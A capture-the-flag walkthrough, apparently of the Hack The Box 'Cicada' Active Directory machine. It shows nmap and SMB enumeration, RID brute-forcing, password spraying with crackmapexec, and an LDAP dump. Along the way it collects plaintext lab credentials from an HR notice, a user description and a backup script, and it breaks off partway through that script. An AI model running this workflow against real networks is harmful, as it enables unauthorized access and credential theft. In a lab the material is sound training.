Nmap Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
| # Nmap 7.95 scan initiated Fri May 23 11:33:31 2025 as: /usr/lib/nmap/nmap -sC -sV -vv -oN nmap 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up, received echo-reply ttl 127 (0.060s latency).
Scanned at 2025-05-23 11:33:31 CDT for 97s
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-23 15:13:06Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
| -----BEGIN CERTIFICATE-----
| MIIF4DCCBMigAwIBAgITHgAAAAOY38QFU4GSRAABAAAAAzANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGY2ljYWRh
| MRUwEwYDVQQDEwxDSUNBREEtREMtQ0EwHhcNMjQwODIyMjAyNDE2WhcNMjUwODIy
| MjAyNDE2WjAfMR0wGwYDVQQDExRDSUNBREEtREMuY2ljYWRhLmh0YjCCASIwDQYJ
| KoZIhvcNAQEBBQADggEPADCCAQoCggEBAOatZznJ1Zy5E8fVFsDWtq531KAmTyX8
| BxPdIVefG1jKHLYTvSsQLVDuv02+p29iH9vnqYvIzSiFWilKCFBxtfOpyvCaEQua
| NaJqv3quymk/pw0xMfSLMuN5emPJ5yHtC7cantY51mSDrvXBxMVIf23JUKgbhqSc
| Srdh8fhL8XKgZXVjHmQZVn4ONg2vJP2tu7P1KkXXj7Mdry9GFEIpLdDa749PLy7x
| o1yw8CloMMtcFKwVaJHy7tMgwU5PVbFBeUhhKhQ8jBR3OBaMBtqIzIAJ092LNysy
| 4W6q8iWFc+Tb43gFP4nfb1Xvp5mJ2pStqCeZlneiL7Be0SqdDhljB4ECAwEAAaOC
| Au4wggLqMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8A
| bABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/
| BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3
| DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjAL
| BglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFAY5YMN7
| Sb0WV8GpzydFLPC+751AMB8GA1UdIwQYMBaAFIgPuAt1+B1uRE3nh16Q6gSBkTzp
| MIHLBgNVHR8EgcMwgcAwgb2ggbqggbeGgbRsZGFwOi8vL0NOPUNJQ0FEQS1EQy1D
| QSxDTj1DSUNBREEtREMsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2Vz
| LENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Y2ljYWRhLERDPWh0Yj9j
| ZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlz
| dHJpYnV0aW9uUG9pbnQwgb0GCCsGAQUFBwEBBIGwMIGtMIGqBggrBgEFBQcwAoaB
| nWxkYXA6Ly8vQ049Q0lDQURBLURDLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXkl
| MjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWNpY2Fk
| YSxEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmlj
| YXRpb25BdXRob3JpdHkwQAYDVR0RBDkwN6AfBgkrBgEEAYI3GQGgEgQQ0dpG4APi
| HkGYUf0NXWYT14IUQ0lDQURBLURDLmNpY2FkYS5odGIwDQYJKoZIhvcNAQELBQAD
| ggEBAIrY4wzebzUMnbrfpkvGA715ds8pNq06CN4/24q0YmowD+XSR/OI0En8Z9LE
| eytwBsFZJk5qv9yY+WL4Ubb4chKSsNjuc5SzaHxXAVczpNlH/a4WAKfVMU2D6nOb
| xxqE1cVIcOyN4b3WUhRNltauw81EUTa4xT0WElw8FevodHlBXiUPUT9zrBhnvNkz
| obX8oU3zyMO89QwxsusZ0TLiT/EREW6N44J+ROTUzdJwcFNRl+oLsiK5z/ltLRmT
| P/gFJvqMFfK4x4/ftmQV5M3hb0rzUcS4NJCGtclEoxlJHRTDTG6yZleuHvKSN4JF
| ji6zxYOoOznp6JlmbakLb1ZRLA8=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
| -----BEGIN CERTIFICATE-----
| MIIF4DCCBMigAwIBAgITHgAAAAOY38QFU4GSRAABAAAAAzANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGY2ljYWRh
| MRUwEwYDVQQDEwxDSUNBREEtREMtQ0EwHhcNMjQwODIyMjAyNDE2WhcNMjUwODIy
| MjAyNDE2WjAfMR0wGwYDVQQDExRDSUNBREEtREMuY2ljYWRhLmh0YjCCASIwDQYJ
| KoZIhvcNAQEBBQADggEPADCCAQoCggEBAOatZznJ1Zy5E8fVFsDWtq531KAmTyX8
| BxPdIVefG1jKHLYTvSsQLVDuv02+p29iH9vnqYvIzSiFWilKCFBxtfOpyvCaEQua
| NaJqv3quymk/pw0xMfSLMuN5emPJ5yHtC7cantY51mSDrvXBxMVIf23JUKgbhqSc
| Srdh8fhL8XKgZXVjHmQZVn4ONg2vJP2tu7P1KkXXj7Mdry9GFEIpLdDa749PLy7x
| o1yw8CloMMtcFKwVaJHy7tMgwU5PVbFBeUhhKhQ8jBR3OBaMBtqIzIAJ092LNysy
| 4W6q8iWFc+Tb43gFP4nfb1Xvp5mJ2pStqCeZlneiL7Be0SqdDhljB4ECAwEAAaOC
| Au4wggLqMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8A
| bABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/
| BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3
| DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjAL
| BglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFAY5YMN7
| Sb0WV8GpzydFLPC+751AMB8GA1UdIwQYMBaAFIgPuAt1+B1uRE3nh16Q6gSBkTzp
| MIHLBgNVHR8EgcMwgcAwgb2ggbqggbeGgbRsZGFwOi8vL0NOPUNJQ0FEQS1EQy1D
| QSxDTj1DSUNBREEtREMsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2Vz
| LENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Y2ljYWRhLERDPWh0Yj9j
| ZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlz
| dHJpYnV0aW9uUG9pbnQwgb0GCCsGAQUFBwEBBIGwMIGtMIGqBggrBgEFBQcwAoaB
| nWxkYXA6Ly8vQ049Q0lDQURBLURDLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXkl
| MjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWNpY2Fk
| YSxEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmlj
| YXRpb25BdXRob3JpdHkwQAYDVR0RBDkwN6AfBgkrBgEEAYI3GQGgEgQQ0dpG4APi
| HkGYUf0NXWYT14IUQ0lDQURBLURDLmNpY2FkYS5odGIwDQYJKoZIhvcNAQELBQAD
| ggEBAIrY4wzebzUMnbrfpkvGA715ds8pNq06CN4/24q0YmowD+XSR/OI0En8Z9LE
| eytwBsFZJk5qv9yY+WL4Ubb4chKSsNjuc5SzaHxXAVczpNlH/a4WAKfVMU2D6nOb
| xxqE1cVIcOyN4b3WUhRNltauw81EUTa4xT0WElw8FevodHlBXiUPUT9zrBhnvNkz
| obX8oU3zyMO89QwxsusZ0TLiT/EREW6N44J+ROTUzdJwcFNRl+oLsiK5z/ltLRmT
| P/gFJvqMFfK4x4/ftmQV5M3hb0rzUcS4NJCGtclEoxlJHRTDTG6yZleuHvKSN4JF
| ji6zxYOoOznp6JlmbakLb1ZRLA8=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-05-23T15:13:54
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 43674/tcp): CLEAN (Timeout)
| Check 2 (port 50003/tcp): CLEAN (Timeout)
| Check 3 (port 62917/udp): CLEAN (Timeout)
| Check 4 (port 40039/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: -1h20m34s
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 23 11:35:08 2025 -- 1 IP address (1 host up) scanned in 97.39 seconds
|
SMB Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| ┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ crackmapexec smb 10.10.11.35 -u 'DoesNotExist' -p '' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\DoesNotExist:
SMB 10.10.11.35 445 CICADA-DC [+] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| ┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ smbclient //10.10.11.35/HR -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 07:29:09 2024
.. D 0 Thu Mar 14 07:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 12:31:48 2024
4168447 blocks of size 4096. 459750 blocks available
smb: \> get Notice from HR.txt
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \Notice
smb: \> mget Notice from HR.txt
NT_STATUS_NO_SUCH_FILE listing \Notice
smb: \> ls
. D 0 Thu Mar 14 07:29:09 2024
.. D 0 Thu Mar 14 07:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 12:31:48 2024
4168447 blocks of size 4096. 459750 blocks available
smb: \> mget "Notice from HR.txt"
Get file Notice from HR.txt? yes
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (2.9 KiloBytes/sec) (average 2.9 KiloBytes/sec)
smb: \>
|
Notice From HR
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| ┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
|
The default password is leaked which is Cicada$M6Corpb*@Lp#nZp!8. Besides, we got an email support@cicada.htb.
User Enumeration (RID-Brute)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| ┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ crackmapexec smb cicada.htb -u 'doesNotExist' -p '' --rid-brute
SMB cicada.htb 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB cicada.htb 445 CICADA-DC [+] cicada.htb\doesNotExist:
SMB cicada.htb 445 CICADA-DC [+] Brute forcing RIDs
SMB cicada.htb 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB cicada.htb 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB cicada.htb 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB cicada.htb 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB cicada.htb 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB cicada.htb 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB cicada.htb 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB cicada.htb 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB cicada.htb 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB cicada.htb 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB cicada.htb 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB cicada.htb 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB cicada.htb 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB cicada.htb 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
|
we found several users, we store this into our users.txt.
Found Valid Credentials!
1
2
3
4
5
6
7
8
| ┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ crackmapexec smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB cicada.htb 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
|
cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB Enumeration Again
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| ┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ crackmapexec smb cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
SMB cicada.htb 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB cicada.htb 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB cicada.htb 445 CICADA-DC [+] Enumerated shares
SMB cicada.htb 445 CICADA-DC Share Permissions Remark
SMB cicada.htb 445 CICADA-DC ----- ----------- ------
SMB cicada.htb 445 CICADA-DC ADMIN$ Remote Admin
SMB cicada.htb 445 CICADA-DC C$ Default share
SMB cicada.htb 445 CICADA-DC DEV
SMB cicada.htb 445 CICADA-DC HR READ
SMB cicada.htb 445 CICADA-DC IPC$ READ Remote IPC
SMB cicada.htb 445 CICADA-DC NETLOGON READ Logon server share
SMB cicada.htb 445 CICADA-DC SYSVOL READ Logon server share
|
This time, we are able to read NETLOGON and SYSVOL.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| ┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ smbclient //10.10.11.35/SYSVOL -U 'cicada.htb\michael.wrightson'
Password for [CICADA.HTB\michael.wrightson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 22 12:40:07 2024
.. D 0 Thu Mar 14 06:08:56 2024
cicada.htb Dr 0 Thu Mar 14 06:08:56 2024
4168447 blocks of size 4096. 479243 blocks available
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \cicada.htb\DfsrPrivate\*
getting file \cicada.htb\Policies\{2480865A-F9E0-4995-B568-987D80F2ADEF}\GPT.INI of size 59 as cicada.htb/Policies/{2480865A-F9E0-4995-B568-987D80F2ADEF}/GPT.INI (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
getting file \cicada.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as cicada.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \cicada.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 23 as cicada.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \cicada.htb\Policies\{2480865A-F9E0-4995-B568-987D80F2ADEF}\Machine\comment.cmtx of size 554 as cicada.htb/Policies/{2480865A-F9E0-4995-B568-987D80F2ADEF}/Machine/comment.cmtx (2.6 KiloBytes/sec) (average 0.8 KiloBytes/sec)
getting file \cicada.htb\Policies\{2480865A-F9E0-4995-B568-987D80F2ADEF}\Machine\Registry.pol of size 160 as cicada.htb/Policies/{2480865A-F9E0-4995-B568-987D80F2ADEF}/Machine/Registry.pol (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
getting file \cicada.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as cicada.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (9.3 KiloBytes/sec) (average 2.6 KiloBytes/sec)
getting file \cicada.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\comment.cmtx of size 554 as cicada.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/comment.cmtx (2.6 KiloBytes/sec) (average 2.6 KiloBytes/sec)
getting file \cicada.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Registry.pol of size 160 as cicada.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Registry.pol (0.8 KiloBytes/sec) (average 2.4 KiloBytes/sec)
getting file \cicada.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1874 as cicada.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (5.5 KiloBytes/sec) (average 2.9 KiloBytes/sec)
getting file \cicada.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 5342 as cicada.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (16.9 KiloBytes/sec) (average 4.7 KiloBytes/sec)
smb: \> exit
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
| ┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ tree cicada.htb
cicada.htb
├── DfsrPrivate
├── Policies
│ ├── {2480865A-F9E0-4995-B568-987D80F2ADEF}
│ │ ├── GPT.INI
│ │ ├── Machine
│ │ │ ├── Registry.pol
│ │ │ └── comment.cmtx
│ │ └── User
│ ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│ │ ├── GPT.INI
│ │ ├── MACHINE
│ │ │ ├── Microsoft
│ │ │ │ └── Windows NT
│ │ │ │ └── SecEdit
│ │ │ │ └── GptTmpl.inf
│ │ │ ├── Registry.pol
│ │ │ └── Scripts
│ │ │ ├── Shutdown
│ │ │ └── Startup
│ │ └── USER
│ │ ├── Documents & Settings
│ │ └── Scripts
│ │ ├── Logoff
│ │ └── Logon
│ └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│ ├── GPT.INI
│ ├── MACHINE
│ │ ├── Microsoft
│ │ │ └── Windows NT
│ │ │ └── SecEdit
│ │ │ └── GptTmpl.inf
│ │ ├── Registry.pol
│ │ ├── Scripts
│ │ │ ├── Shutdown
│ │ │ └── Startup
│ │ └── comment.cmtx
│ └── USER
│ ├── Documents & Settings
│ └── Scripts
│ ├── Logoff
│ └── Logon
└── scripts
33 directories, 10 files
|
Nothing interesting…
WinRM Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| ┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ evil-winrm -i cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
|
we also cannot remote connect by using this credentials.
LDAP dump
1
2
3
4
5
6
7
| ┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ ldapdomaindump -u "cicada.htb\\michael.wrightson" -p 'Cicada$M6Corpb*@Lp#nZp!8' ldap://10.10.11.35
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
|
Domain Users
By looking at domain_users.html , we found an interesting description:
Where david.orelious:aRt$Lp#7t*VQ!3 credentials was found!
Domain users by group
Emily Oscars might be the High valued target for us. She can Remote connect to the machine and have the backup privileges.
David Enumeration Again
SMB Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| ┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ crackmapexec smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC [+] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV READ
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
|
good, we can read DEV shares now!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| ┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ smbclient //10.10.11.35/DEV -U 'cicada.htb\david.orelious'
Password for [CICADA.HTB\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 07:31:39 2024
.. D 0 Thu Mar 14 07:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 12:28:22 2024
4168447 blocks of size 4096. 478846 blocks available
smb: \> mget *
Get file Backup_script.ps1? y
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (2.0 KiloBytes/sec) (average 2.0 KiloBytes/sec)
smb: \> exit
|
Backup Script?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| ┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
